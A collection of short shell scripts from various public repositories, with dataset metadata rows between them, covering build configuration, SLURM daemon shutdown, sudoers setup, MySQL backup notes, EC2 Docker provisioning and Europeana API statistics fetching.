# bundled snappy once, and emit build_config.mk for the top-level Makefile.
BASE_DIR=$(pwd)
TARGET_OS=$(uname -s)
LEVELDB_PATH="$BASE_DIR/deps/leveldb-1.14.0"
SNAPPY_PATH="$BASE_DIR/deps/snappy-1.1.0"
MAKE=make

# Per-platform thread/runtime libraries (and make flavour).
case "$TARGET_OS" in
    Darwin)
        #PLATFORM_CLIBS="-pthread"
        #PLATFORM_CFLAGS=""
        ;;
    Linux)
        PLATFORM_CLIBS="-pthread"
        ;;
    CYGWIN_*)
        PLATFORM_CLIBS="-lpthread"
        ;;
    SunOS)
        PLATFORM_CLIBS="-lpthread -lrt"
        ;;
    FreeBSD)
        PLATFORM_CLIBS="-lpthread"
        MAKE=gmake
        ;;
    NetBSD)
        PLATFORM_CLIBS="-lpthread -lgcc_s"
        ;;
    OpenBSD)
        PLATFORM_CLIBS="-pthread"
        ;;
    DragonFly)
        PLATFORM_CLIBS="-lpthread"
        ;;
    HP-UX)
        PLATFORM_CLIBS="-pthread"
        ;;
    *)
        echo "Unknown platform!" >&2
        exit 1
esac

# Build the bundled snappy once (configure leaves a Makefile behind).
# Guard the cd: the original silently kept going in the source root when
# the deps directory was missing, running ./configure in the wrong place.
DIR=$(pwd)
cd "$SNAPPY_PATH" || exit 1
if [ ! -f Makefile ]; then
	echo ""
	echo "##### building snappy... #####"
	./configure
	# snappy's generated file timestamps confuse make on some Linux
	# systems, so refresh everything before building.
	find . | xargs touch
	make
	echo "##### building snappy finished #####"
	echo ""
fi
cd "$DIR" || exit 1

# Emit build_config.mk consumed by the top-level Makefile.
rm -f build_config.mk
{
	echo "MAKE=$MAKE"
	echo "LEVELDB_PATH=$LEVELDB_PATH"
	echo "SNAPPY_PATH=$SNAPPY_PATH"
	echo "CFLAGS="
	echo "CFLAGS = -DNDEBUG -D__STDC_FORMAT_MACROS -Wall -O2 -Wno-sign-compare"
	echo "CFLAGS += ${PLATFORM_CFLAGS}"
	echo "CFLAGS += -I \"$LEVELDB_PATH/include\""
	echo "CFLAGS += -I \"$BASE_DIR/src/include\""
	echo "CLIBS="
	echo "CLIBS += ${PLATFORM_CLIBS}"
	echo "CLIBS += \"$LEVELDB_PATH/libleveldb.a\""
	echo "CLIBS += \"$SNAPPY_PATH/.libs/libsnappy.a\""
} >> build_config.mk
| true
|
9b76f364b86114454c9c372e3db7fdbfd54214c8
|
Shell
|
BharathR-Git/ec2-user
|
/scripts/createsoft.sh
|
UTF-8
| 490
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
# Interactively create a symbolic link to an existing file.
# Prompts for the target file name, then for the link name.
echo "Create a softlink"
# Prompt BEFORE reading: the original script read the name first and only
# then printed "Enter a file name", leaving the user at a blank line.
echo "Enter a file name"
read -r file
if [ ! -f "$file" ];then
echo "$file doesn't exist" >&2
exit 1
fi
echo "Enter softlink name of a file $file"
read -r link
if [ -L "$link" ];then
echo "$link already exists" >&2
exit 1
fi
# -- stops option parsing in case a name starts with '-'.
ln -s -- "$file" "$link"
| true
|
3b29adc441579212b08d57efc8f2ca91eaf3485a
|
Shell
|
jk983294/CommonScript
|
/linux/ShellScript/for/create_user.sh
|
UTF-8
| 118
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# Announce each user passed as a script argument, then report completion.
# Example: ./create_user.sh a b c d
for username in $*; do
	printf 'add user %s\n' "$username"
done
printf 'finished\n'
| true
|
cc910f1402bfa1ae09e6ad1c25937c2e8b4a8a72
|
Shell
|
artpol84/jobstart
|
/slurm_deploy/files/slurm_kill.sh
|
UTF-8
| 599
| 3.375
| 3
|
[
"BSD-3-Clause-Open-MPI"
] |
permissive
|
#!/bin/bash -x
#
# Copyright (C) 2016-2017 Mellanox Technologies, Inc.
#                         All rights reserved.
# $COPYRIGHT$
#
# Additional copyrights may follow
#
# $HEADER$
#
# Kill the slurmd/slurmctld daemons whose pids are recorded under
# $SLURM_INST/var/*.pid.
#   $1 - SLURM installation prefix.
# NOTE: the shebang was originally on line 10 (after the copyright block),
# where the kernel ignores it; it must be the very first line.

SLURM_INST=$1

# Kill the daemon named $1 if its pid file exists and the pid still maps
# to a live process of that name; silently succeed otherwise.
function kill_binary()
{
    name=$1
    if [ ! -f "$SLURM_INST/var/$name.pid" ]; then
        return 0
    fi
    pid=$(cat "$SLURM_INST/var/$name.pid")
    # Guard against stale pid files: only kill when the pid belongs to a
    # running process whose command line mentions the expected name.
    need_kill=$(ps ax | grep "$pid" | grep "$name")
    if [ -n "$need_kill" ]; then
        kill -KILL "$pid"
    fi
}

function kill_slurmd()
{
    kill_binary "slurmd"
}

function kill_ctld()
{
    kill_binary "slurmctld"
}

kill_slurmd
kill_ctld
| true
|
47b1b53124461b0d729ac2fc536d0f1d78eb0e2a
|
Shell
|
porcupine18/rwloadsim
|
/src/rwlpatch.sh
|
UTF-8
| 714
| 3
| 3
|
[
"UPL-1.0"
] |
permissive
|
#!/bin/bash
#
# Copyright (c) 2021 Oracle Corporation
# Licensed under the Universal Permissive License v 1.0
# as shown at https://oss.oracle.com/licenses/upl/
#
# Create a new rwlpatch.c file
#
# History
#
# bengsig 10-feb-2021 Only patch, rest in rwlwatermark
# bengsig 16-dec-2020 Make first patch zero
# bengsig 14-dec-2020 Allow non existing rwlpatch.txt
# bengsig 04-sep-2020 Solaris port, use printf in stead of echo
# bengsig 11-jun-2017 Create

# Bump the persisted patch counter in rwlpatch.txt; start at 0 when the
# file does not exist yet.  Shell arithmetic replaces the original
# expr(1) subprocess.
if test -f rwlpatch.txt
then
  newpatch=$(( $(cat rwlpatch.txt) + 1 ))
else
  newpatch=0
fi
printf '%s\n' "$newpatch" > rwlpatch.txt
# Regenerate rwlpatch.c so the binary embeds the new patch number.
printf '#include "rwl.h"\n' > rwlpatch.c
printf 'ub4 rwlpatch = %s;\n' "$newpatch" >> rwlpatch.c
| true
|
9086392f931a67c921788186a52a2f284241ab90
|
Shell
|
anutter4/dotfiles
|
/bash/available-scripts.d/screen.sh
|
UTF-8
| 335
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Helps screen share ssh-agents
#
# Must have the following in .screenrc:
#
#  unsetenv SSH_AUTH_SOCK
#  setenv SSH_AUTH_SOCK $HOME/.screen/ssh-auth-sock.$HOSTNAME

# Symlink the current agent socket to a stable, per-host path so every
# shell inside screen can find the agent.
_ssh_auth_save() {
	# Create the target directory first: on a fresh account ~/.screen
	# does not exist and ln -sf would fail silently inside the alias.
	mkdir -p "$HOME/.screen"
	ln -sf "$SSH_AUTH_SOCK" "$HOME/.screen/ssh-auth-sock.$HOSTNAME"
}
alias screen='_ssh_auth_save ; export HOSTNAME=$(hostname) ; screen'
| true
|
f8bf6dc2e1a63eda92ad69177e907eef8750f5ba
|
Shell
|
jlefrique/dotfiles
|
/bin/markup.sh
|
UTF-8
| 191
| 2.734375
| 3
|
[] |
no_license
|
#!/system/bin/sh
# Prefix every stdin line with a running "Markup #N" counter, echo it and
# mirror it into the Android logcat buffer.
COUNTER=1
while read -r line; do
	LINE="Markup #${COUNTER} -- ${line}"
	# Quote the expansion: unquoted, the line word-splits and log(1)
	# received only the first word as its tag.
	echo "${LINE}"
	log -t "${LINE}"
	# POSIX arithmetic instead of the bash-only 'let'.
	COUNTER=$((COUNTER + 1))
done
| true
|
c51e81dca8b23ec3c691edf0d595ad0cbf739cef
|
Shell
|
mrosata/kleos
|
/setup-sudo.sh
|
UTF-8
| 1,766
| 4.5
| 4
|
[] |
no_license
|
#!/bin/bash
# Install sudo (if missing) and add a user to /etc/sudoers.
# Must be run as root; pass the user name as the only argument.
echo "This script must be ran as root. The reason for this is that"
echo "installing sudo isn't a decision that you can make unless you"
echo "are the root user of a system. This script installs sudo, but"
echo "most systems include sudo already. This is a hack really, I am"
echo "comfortable running this on my system, but you need to make up"
echo "your own mind. Script also adds a user to the /etc/sudoers "
echo "file. "
echo " -- Pass a user name to add to file as only param to script"

ERRNO_USER=103
ERRNO_ROOT=104

# Refuse to run for anyone but uid 0.
if [ "$(id -au)" != "0" ];then
  echo "MUST RUN THIS SCRIPT AS ROOT!"
  exit $ERRNO_ROOT
fi

username="$1"

# Ask a yes/no question; proceed on "y", exit the whole script on "n".
function prompt_user_to_continue {
  local question="${1:-Yes (y) or no (n)}"
  while true
  do
    read -p "$question" answer
    case $answer in
      [yY]* )
        break ;;
      [nN]* )
        exit ;;
      * )
        echo "Enter either yes (y) or No (n)" ;;
    esac
  done
}

if [ -z "$username" ];then
  echo "Pass a username as argument to script, IE:"
  echo " $0 michael"
  exit 1
fi

# Redirection order fixed: the original '2>&1 > /dev/null' still printed
# stderr; '> /dev/null 2>&1' silences both streams.
if id -au "$username" > /dev/null 2>&1 ; then
  # 'command -v' is the portable replacement for 'which'.
  if ! command -v sudo > /dev/null ;then
    # Only continue if user says (yes)
    prompt_user_to_continue "Install sudo package?"
    apt-get install sudo -y
  fi
  if [ -f /etc/sudoers ]; then
    # grep -c counts matching lines directly (no cat | grep | wc -l).
    RES=$(grep -c "$username ALL=" /etc/sudoers)
    if [ "$RES" -gt 0 ];then
      echo "User is already in sudoers file..."
      echo "Use vigr or edit /etc/sudoers manually"
      exit 0
    fi
    # Only add username to sudoers file if user says (yes)
    prompt_user_to_continue "Add $username to /etc/sudoers?"
    echo "$username ALL=(ALL) ALL" >> /etc/sudoers
  fi
else
  echo "Sorry, User named \"$username\" not exists"
  exit $ERRNO_USER
fi
exit 0
| true
|
e3bdfdbc9125732a582203793c59763309e4e6f1
|
Shell
|
shrekee/code
|
/shell/homework/auto_mysqldump.sh
|
UTF-8
| 2,653
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# File Name:    auto_mysqldump.sh
# Author:       Liwqiang
# mail:         shrekee@qq.com
# Created Time: Sat 04 Aug 2018 09:54:47 PM CST
#
# Full hot backup of all databases via mysqldump, intended to run from
# crontab at 4am (the quietest time on the server).
#
# Requirements for the hot backup:
#  1. Both MyISAM and InnoDB engines may be present, so lock tables
#     before the backup: --lock-tables / --lock-all-tables
#  2. Full backup of everything: --all-databases
#  3. Rotate the binary log so restores have a clean starting point:
#     --flush-logs
#  4. Record the binlog coordinates inside the dump: --master-data=2
#  5. MyISAM -> warm backup (tables must be locked first)
#  6. --lock-all-tables for a whole-server backup
#  7. --lock-tables when only a few tables are dumped
#  8. InnoDB -> hot backup:
#       --single-transaction
#       --flush-logs
#       --routines  (stored procedures and functions)
#       --triggers
#       --events
#       --master-data=(0|1|2): usually 2; use 1 on a replication master
#
# Drawbacks of mysqldump backups:
#  1. Floating point values may lose precision
#  2. The dump takes more space than the raw data (compress to save space)
#  3. Not suitable for full backups of very large databases
#  4. Not suitable when exact fidelity is required
#  5. With InnoDB the locking phase can take a long time (possibly hours)
#
# NOTE: when restoring from a mysqldump, the restore would be re-applied to
# the binary log; temporarily disable it ('set sql_log_bin=0') before the
# restore and re-enable it afterwards.
#
# SECURITY(review): the password on the command line is visible in `ps`;
# prefer ~/.my.cnf or --defaults-extra-file.
# Fixed option typos from the original:
#   --all-datebases  -> --all-databases
#   --lock-alltables -> --lock-all-tables
mysqldump -uroot -p123 --flush-logs --master-data=2 --all-databases --lock-all-tables > /tmp/mysqldump_full_backup
###
### SELECT ... INTO OUTFILE backup, pros and cons:
###  + uses less space than mysqldump; restore can be partial
###  - cannot back up table structure; single table only
### SELECT * INTO OUTFILE '/PATH/TO/NAME' FROM table_name [WHERE CLAUSE];  -- create backup
### LOAD DATA INFILE 'FILE_NAME' INTO TABLE table_name [WHERE CLAUSE];     -- restore data
###
#######################################################################
######################################################################
# Backup method three: LVM hot backup via --SNAPSHOT
# Freeze the data for an instant, take a snapshot, release the lock, then
# physically copy the data to another disk.
###### Requirements:
#  1. Data files must live on a logical volume
#  2. The volume group must have enough free space for the snapshot
#  3. Binary logs and transaction logs must be on the same volume as the
#     data files to keep the copy consistent
#
#
#
| true
|
d55ccba144e0dd455d2dd34996f3b17f23043cac
|
Shell
|
hadasz/web3studio-bootleg
|
/packages/bootleg-common/bin/bootleg-setup-ganache
|
UTF-8
| 775
| 3.8125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Ensure a local ganache-cli (Ethereum test chain) is listening on the
# ganache port, starting one — and cleaning it up on exit — only when
# none is already running.

# Kill the ganache instance that we started (if we started one and if it's still running).
cleanup_ganache() {
  if [ -n "$ganache_pid" ] && ps -p $ganache_pid > /dev/null; then
    echo "Stopping Ganache"
    kill $ganache_pid
  fi
}

ganache_port=8545
# Deterministic mnemonic so test accounts and keys are reproducible runs.
ganache_mnemonic="candy maple cake sugar pudding cream honey rich smooth crumble sweet treat"

# True when something already accepts TCP connections on the ganache port.
ganache_running() {
  nc -z localhost "$ganache_port" &> /dev/null
}

# Launch ganache-cli in the background and block until the port opens.
# NOTE(review): this loops forever if ganache-cli fails to start —
# confirm callers are fine without a timeout.
start_ganache() {
  ganache-cli --port "$ganache_port" --mnemonic "$ganache_mnemonic" > /dev/null &
  ganache_pid=$!
  while ! ganache_running; do
    sleep 0.1
  done
}

# Always try to stop the instance we spawned, whatever the exit path.
trap cleanup_ganache EXIT

if ganache_running; then
  echo "Using existing ganache instance"
else
  echo "Starting our own ganache instance"
  start_ganache
fi
| true
|
b0f5a0637d469c310a6b07aa94a46b7cc7ed04ad
|
Shell
|
2019surbhi/mudcookies
|
/src/train-celltype-with-scpred.sh
|
UTF-8
| 1,240
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Train an scPred cell-type classifier from an annotated Seurat object:
# generate an R script by substituting the placeholders in the heredoc
# below, then run it with R and save the trained model.
usage="
$BASH_SOURCE <seurat.obj> <scpred.obj> [nproc]
<seurat.obj> : cell_type annotation must be in meta.data
<scpred.obj> : scpred object
[nproc] : multi-cores (default 2)
"; if [ $# -lt 1 ];then echo "$usage";exit; fi
# Positional arguments (see $usage above).
ip=$1
op=${2:-"out_scpred.rds"}
nproc=${3:-2}
# The quoted 'EOF' keeps the R code literal; the sed stages then replace
# the INPUT/OUTPUT/NPROC placeholders and write the script to $op.rcmd.
cat << 'EOF' | sed "s#INPUT#$ip#" | sed "s#OUTPUT#$op#" \
| sed "s#NPROC#$nproc#" >$op.rcmd
# ref: https://powellgenomicslab.github.io/scPred/articles/introduction.html
library("scPred")
library("Seurat")
library("magrittr")
require("doParallel")
require("mda")
input = "INPUT"
output= "OUTPUT"
nproc=NPROC
# test set
if( !file.exists( input ) && input == "test" ){
d = scPred::pbmc_1
}else{
d = readRDS(input);
}
# query data must use the same norm.
d = d %>%
NormalizeData() %>%
FindVariableFeatures() %>%
ScaleData() %>%
RunPCA()
d = getFeatureSpace(d, "cell_type") # default svmRadial
cl = makePSOCKcluster(nproc)
registerDoParallel(cl)
d = trainModel(d, model= "mda", allowParallel=T)
# retraining : d<- trainModel(d, model = "mda", reclassify = c("cMono", "ncMono"))
stopCluster(cl)
scpred=get_scpred(d)
saveRDS(scpred, file=output)
# new_embedding_aligned vs new_embedding : after and before harmony
EOF
# Execute the generated R script non-interactively.
R --no-save -f $op.rcmd
| true
|
96c7f9057b763dc6710022d45ad58333abab0025
|
Shell
|
amila-ku/ansible-aws-autoscaling
|
/roles/create_asg/files/user_data_ubuntu.sh
|
UTF-8
| 736
| 2.546875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# EC2 user-data bootstrap for Ubuntu: installs Docker CE and docker-compose,
# then launches the wordpress-prometheus stack via compose.
# Prerequisites for adding Docker's apt repository over HTTPS.
sudo apt-get install -y \
apt-transport-https \
ca-certificates \
curl \
software-properties-common
# Trust Docker's package signing key and register the stable channel.
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
sudo apt-get update
sudo apt-get install -y docker-ce git python
# Let the default user run docker without sudo (takes effect on next login).
sudo usermod -a -G docker ubuntu
sudo service docker start
# Pinned docker-compose 1.16.1 binary matching this kernel and arch.
curl -L https://github.com/docker/compose/releases/download/1.16.1/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# Fetch and start the application stack.
sudo git clone https://github.com/amila-ku/wordpress-prometheus.git /wp
cd /wp
docker-compose up -d
| true
|
ca249934a57102f9e0a59564bbe9b20d5ec95266
|
Shell
|
kingsleychow/CardioDBSg
|
/bin/update_V2ENS.sh
|
UTF-8
| 1,715
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/bash
##################################################################################################
# 9. V2Ensembls (incremental updates)
##################################################################################################
# called within bin/update_tables_after_run.sh
# global variables defined in /etc/profile.d/cardiodb.sh
# Shebang fixed: the original read "#/bin/bash" (missing '!'), which is just
# a comment — the kernel never saw an interpreter directive.
##################################################################################################
printf "perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --new_entries --v2ensx --annotation\n"
time perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --new_entries --v2ensx --annotation
#printf "perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --not_in_v2ensembl --v2ensx --annotation\n"
#time perl ${CARDIODB_ROOT}/bin/make_V2Ensembls.pl --sql --db ${CARDIODB} --all --not_in_v2ensembl --v2ensx --annotation
printf "mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Ensembls/V2Ensembls.all.added.txt\n"
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Ensembls/V2Ensembls.all.added.txt
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2dbSNPs/V2dbSNPs.all.added.txt
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Phens/V2Phens.all.added.txt
time mysqlimport --local --lock-tables --replace ${CARDIODB} ${CARDIODB_ROOT}/Dump/V2Freqs/V2Freqs.all.added.txt
echo Running V2Families...
# this will trigger 'insert_v2families_and_isnovel_after_v2ensembls'
# However if V2Ensembls is repopulated freshly, you should run SQL/V2Families.sql and SQL/IsNovel
| true
|
e0ec5fb123dce8b7f862ba6b7381902350016744
|
Shell
|
pierrz/europeana_experiments
|
/statistics/APIstats_ThemColl_v1.1__mainLists.sh
|
UTF-8
| 2,288
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
# ___________________________________________________________________________________
# This script is licensed under the MIT license. (http://opensource.org/licenses/MIT)
# Credits: Pierre-Edouard Barrault
# http://pierrz.com

# Script designed in order to pull statistics from the Europeana Search API and feed into shared Google Spreadsheets.
# Mainly bypass the limitations of ImportJSON.gs script regarding the max URL lenght it can fetch
# (Extra long URLs tend to be an outcome of using extensive Thematic collections queries).
# NOTE: the shebang was originally written "# !/bin/bash" further down the
# file, which is just a comment; it must be the very first line.

echo "__________________________________"
echo "__________________________________"
echo "### MAIN LISTS SCRIPT ###"
echo "__________________________________"
echo "__________________________________"

# TIMESTAMP FUNCTIONS
timestamp() {
date +"_%Y-%m-%dT%H:%M:%S"
}
DATE=$(timestamp)

# QUERY PARAMETERS
# Output directory
dirOutput="output/migration/mainLists/"
# Thematic Collection query fetched from separate txt file
query_main=$(cat themes/query_migration.txt)
# API key
apiKey=$(cat API_key.txt)
query_apikey_param="&wskey="
query_apikey="$query_apikey_param$apiKey"
# Search API main gears
query_baseUrl="https://www.europeana.eu/api/v2/search.json?start=1&rows=0&qf="
json_ext="json"
# Query parameter
query_all="&query=*"
# Facets: request up to 2000 facet values per field.
facet_dataProvider="&profile=facets&facet=DATA_PROVIDER&f.DATA_PROVIDER.facet.limit=2000"
facet_provider="&profile=facets&facet=PROVIDER&f.PROVIDER.facet.limit=2000"
query_facet_dataProvider="$query_baseUrl$query_main$query_all$facet_dataProvider$query_apikey"
query_facet_provider="$query_baseUrl$query_main$query_all$facet_provider$query_apikey"
dataProvider_labelFile="migration_dataProviders"
provider_labelFile="migration_providers"
file_dataProvider="$dirOutput$dataProvider_labelFile.$json_ext"
file_provider="$dirOutput$provider_labelFile.$json_ext"

# LISTS: fetch both facet lists as JSON.
echo "______"
echo " |---> DATA PROVIDERS LIST"
wget -O "$file_dataProvider" "$query_facet_dataProvider"
echo ""
echo " |---> PROVIDERS LIST"
wget -O "$file_provider" "$query_facet_provider"
echo ""

# ZIPPING full output
echo "+++++++++++++++++"
echo "Zipping JSON results"
echo ""
# Guard the cd: zipping from the wrong directory would archive the wrong
# files (or fail confusingly) when the output tree is missing.
cd output/migration/mainLists || exit 1
zip "../../../zips/stats_migration_mainLists_$DATE.zip" *.json
cd ../../.. || exit 1
exit 0;
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.